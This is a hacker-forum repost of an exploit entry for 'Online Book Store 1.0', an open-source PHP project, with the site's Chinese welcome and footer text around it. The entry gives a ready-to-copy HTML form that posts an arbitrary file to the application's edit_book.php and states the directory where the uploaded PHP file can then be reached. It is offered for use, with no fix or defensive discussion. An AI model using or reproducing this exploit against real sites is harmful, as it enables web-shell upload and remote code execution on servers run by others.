Online Book Store 1.0 - Arbitrary File Upload - 黑帽漏洞数据库

游客您好，欢迎来到黑客世界论坛！您可以在这里进行注册。

赤队小组-代号1949（原CHT攻防小组）在这个瞬息万变的网络时代，我们保持初心，创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识，您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告，请注册用户查看我们的使用与隐私策略，谢谢您的配合。小组成员可以获取论坛隐藏内容！

TheHackerWorld官方

发布于2022年11月4日2年前

# Exploit Title: Online Book Store 1.0 - Arbitrary File Upload 
# Google Dork: N/A
# Date: 2020-01-16
# Exploit Author: Or4nG.M4n aka S4udiExploit 
# Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-book-store-project-in-php/
# Software Link: https://github.com/projectworlds32/online-book-store-project-in-php/archive/master.zip
# Version: 1.0
# Tested on: MY MIND v1.23.45
# CVE: N/A
# WWW . SEC4EVER . COM
 -> hola amigos ^.^
 -> just copy this html code 
 <form method="post" action="http://TARGET/edit_book.php" enctype="multipart/form-data">
				<td><input type="text" name="isbn" value="978-1-49192-706-9" readOnly="true"></td>
				<td><input type="text" name="author" value="Or4nG.M4n aka S4udiExploit" required></td>
				<td><input type="file" name="image"></td>
		    <input type="submit" name="save_change" value="Change" class="btn btn-primary">		
	</form>
 -> after you upload your'e file u will find it here /store/bootstrap/img/[FILE].php
# i think am back %^_^% 
# i-Hmx , N4ssim , Sec4ever , The injector , alzher , All the Member of Sec4ever.com
# big thanks to Stupid Coder ^.^

登录

游客您好，欢迎来到黑客世界论坛！您可以在这里进行注册。

Online Book Store 1.0 - Arbitrary File Upload

精选回复

创建帐户或登录后发表意见

最近浏览 0

帐户

导航

搜索